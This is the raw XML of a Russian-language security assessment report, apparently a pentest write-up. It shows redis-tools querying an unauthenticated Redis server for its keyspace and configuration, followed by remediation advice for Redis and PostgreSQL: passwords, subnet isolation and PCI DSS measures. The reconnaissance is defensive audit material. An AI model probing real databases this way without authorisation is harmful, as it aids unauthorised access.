          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00544DF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Redis использовался redis-tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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B76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dumping Database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B76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.0.11:6379&gt; INFO keyspace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B76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Keyspace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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93B76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db0:keys=1,expires=0,avg_ttl=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Получение конфигурации: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3B76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.0.11:6379&gt;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INFO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 w:rsidRPr="00F93B76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
      <w:r w:rsidRPr="00F93B76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00F93B76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r w:rsidRPr="00F93B76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:7.0.12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redis_git_sha1:00000000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redis_git_dirty:0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redis_build_id:8547ca08f5196808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redis_mode:standalone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os:Linux 6.3.0-kali1-amd64 x86_64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arch_bits:64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monotonic_clock:POSIX clock_gettime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multiplexing_api:epoll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atomicvar_api:c11-builtin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gcc_version:12.2.1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process_id:1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process_supervised:no</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93B76" w:rsidRPr="00F93B76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t>run_id:cbb366e3190521e435723994bc9ff7fc9643b235</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD1799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 w:rsidRPr="00F93B76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tcp_port:6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93B76" w:rsidRPr="00544DF0" w:rsidRDefault="00F93B76" w:rsidP="00F93B76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….</w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00CD1799" w:rsidRPr="00544DF0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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD1799" w:rsidRDefault="003C5381">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="24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auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Заключение и рекомендации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/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Выявленные уязвимости можно предотвратить на стадии проектирования и настройки приложения. Выделить БД в отдельную подсеть, доступ к которой будет строго регламентирован.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Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> не оставлять «настройки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> по умолчанию», внести изменения в конфигурационные файлы в соответствии с требованиями информационной безопасности:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD1799" w:rsidRDefault="003C5381">
      <w:pPr>
        <w:pStyle w:val="af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настройках файла </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  (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>) исключить возможность доверенного соедин</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ения, ограничить подсети с которых можно осуществить подключения к БД.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD1799" w:rsidRDefault="003C5381">
      <w:pPr>
        <w:pStyle w:val="afa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настройках файла redis.conf (Redis) установить пароль для пользователей БД, ограничить подсети с которых Redis должен принимать запросы.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Осуществлять подключение с использованием паро</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ля, добавить пользователей с разграничением ролей (администраторы, операторы, аудиторы), в идеале с использованием сертификата  и пароля.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результате анализа приложения разработчику рекомендовано учесть в работе рекомендации стандарта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PCI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DSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, такие как с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>истемы в которых храниться, обрабатывается конфиденциальная информация выделить в отдельные сети, усилить аутентификацию пользователей при подключении к БД.  CIS PostgreSQL Benchmarks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD1799" w:rsidRDefault="003C538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После установки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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> не оставлять «настройки по умолчанию»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, внести изменения в конфигурационные файлы в соответствии с требованиями информационной безопасности.</w:t>
      </w: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D1799" w:rsidRDefault="00CD179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sectPr w:rsidR="00CD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381" w:rsidRDefault="003C5381">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003C5381" w:rsidRDefault="003C5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381" w:rsidRDefault="003C5381">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003C5381" w:rsidRDefault="003C53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1A32A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9544C050"/>
    <w:lvl w:ilvl="0" w:tplc="4FD2B9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40A1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25EC8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F8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62BE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AC86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4A1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4CFF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E4685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1968AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49BE76F6"/>
    <w:lvl w:ilvl="0" w:tplc="309637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E26734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F44A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02ED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56EEF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9414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4EC2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C23E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3BC1F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AB380D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36B4058C"/>
    <w:lvl w:ilvl="0" w:tplc="2FFEB4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7AB9B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E288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0866D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4C2F3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FB600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C432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4406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6BC0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262998"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B86228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6A091D75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B503EC2"/>
    <w:lvl w:ilvl="0" w:tplc="E4DE9BDC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AC1679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8A88FD7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BA26D7F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7BF876F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2D3A809A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28D865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524BE7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E716FAC8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73A5479B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="896C7D26"/>
    <w:lvl w:ilvl="0" w:tplc="81D06B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D766EEF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63D8D10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180970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66D8C9E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37261AF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5897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9646757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615447F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799"/>
    <w:rsid w:val="003C5381"/>
    <w:rsid w:val="00544DF0"/>
    <w:rsid w:val="00CD1799"/>
    <w:rsid w:val="00F93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9BD56"/>
  <w15:docId w15:val="{89332B8C-49EC-469E-B730-D67139FD2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basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:r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f7">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="24">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="af8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9">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afa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8B2FB5-D543-4029-8AC2-6FDA69514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1343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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-26T07:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-08T19:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>